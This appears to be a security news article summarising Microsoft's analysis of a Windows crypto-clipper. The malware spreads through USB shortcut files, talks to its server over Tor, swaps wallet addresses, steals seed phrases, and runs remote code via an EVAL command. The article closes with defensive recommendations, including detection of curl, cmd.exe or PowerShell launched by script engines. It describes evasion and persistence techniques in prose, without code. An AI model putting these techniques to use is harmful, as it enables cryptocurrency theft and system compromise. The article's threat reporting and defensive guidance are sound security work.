The Microsoft Defender Security Research team has published an in-depth analysis of a Windows crypto-clipper campaign that combines worm-like propagation via USB drives, routing traffic through an embedded Tor client, and replacing cryptocurrency addresses in the clipboard. According to Microsoft, the campaign has presumably been active since February 2026. The threat affects all Windows users who work with cryptocurrency wallets and is notable in that it turns a financially motivated stealer into a full-fledged lightweight backdoor with remote code execution capabilities.
Infection chain: from USB to Tor
The initial attack vector is a malicious Windows Shortcut (LNK) file distributed via USB drives. When the shortcut is opened, it launches a worm component that checks whether the machine is already infected and downloads the payload from a remote server only if no previous infection is found.
The worm implements an elegant social-engineering trick at the file-system level: it scans the USB device for documents in common formats (DOC, XLSX, PDF), hides the original files, and creates LNK shortcuts with the same names in their place. Believing they are opening a regular document, the user actually runs malicious code. At the same time, the worm spreads to other connected USB drives and creates scheduled tasks to ensure persistence for both components — the worm and the stealer.
Clipper architecture: script engine instead of binary implant
The architectural design chosen by the malware authors deserves special attention. The clipper uses WScript and ActiveXObject to interact with the operating system — an approach that makes it possible to do without a traditional installer and reduces the likelihood of detection by static antivirus signatures. Instead of connecting to a command server over a public IP infrastructure, the malware deploys a portable Tor client, routing all traffic through a local SOCKS5 proxy to a hidden service (.onion).
The evasion mechanism is noteworthy: the malware terminates if it detects Task Manager among the active processes. This is a simple but effective check, designed so that an analyst or suspicious user who opens Task Manager will not see any suspicious activity.
Final stage: from stealer to backdoor
At the final stage, the malware launches a renamed Tor binary in a hidden window, generates a unique victim identifier, and registers it on the command server. After that, it enters a continuous loop with two parallel tasks:
- Clipboard monitoring roughly every 500 milliseconds — extracting seed phrases, private keys, and replacing copied cryptocurrency wallet addresses with the attackers’ addresses
- Polling the command server for instructions, including the ability to execute arbitrary code via the EVAL command
It is the presence of the EVAL command that turns a financially motivated clipper into a full-fledged backdoor. As Microsoft notes, the malware “mixes data theft with remote code execution,” allowing operators to expand its functionality at any moment — from exfiltrating screenshots (already implemented) to loading additional modules.
Impact assessment
The highest risk is to users and organizations that handle cryptocurrency assets on Windows systems, especially in environments where USB drives are used for file exchange. Worm-like propagation via USB makes the threat particularly dangerous for organizations with insufficient control over removable media — corporate environments with shared workstations, educational institutions, and small businesses.
The clipboard polling frequency (every 500 ms) virtually guarantees interception of a copied wallet address before the user has time to paste it. At the same time, the use of Tor for communication with the command server significantly complicates network-based detection and blocking at the perimeter level.
Defense recommendations
Microsoft recommends prioritizing behavior-based detection over static signatures. Specific measures include:
- Disable AutoRun/AutoPlay for all removable media
- Block execution of LNK files from removable drives via Group Policy (GPO)
- Restrict the use of wscript.exe and cscript.exe — prohibit execution for users who do not need script engines for their work
- Configure detection of curl, cmd.exe, PowerShell, or atypical executables being launched via WScript, CScript, and similar script engines
- Monitor behavior related to the clipboard and screen capture on devices that process financial transactions
- Track the appearance of Tor processes or unusual SOCKS5 proxies on workstations
Organizations working with cryptocurrency assets should immediately review their removable-media policies and ensure that AutoRun is disabled and script execution via WSH is restricted on all workstations. Given that the malware is actively exploited and can evolve through the EVAL mechanism, any delay in implementing these measures directly increases the window of opportunity for cryptocurrency theft and system compromise.
